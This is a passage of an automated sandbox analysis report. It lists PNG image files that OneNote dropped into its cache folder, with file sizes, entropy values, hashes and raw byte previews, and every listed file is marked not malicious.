Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
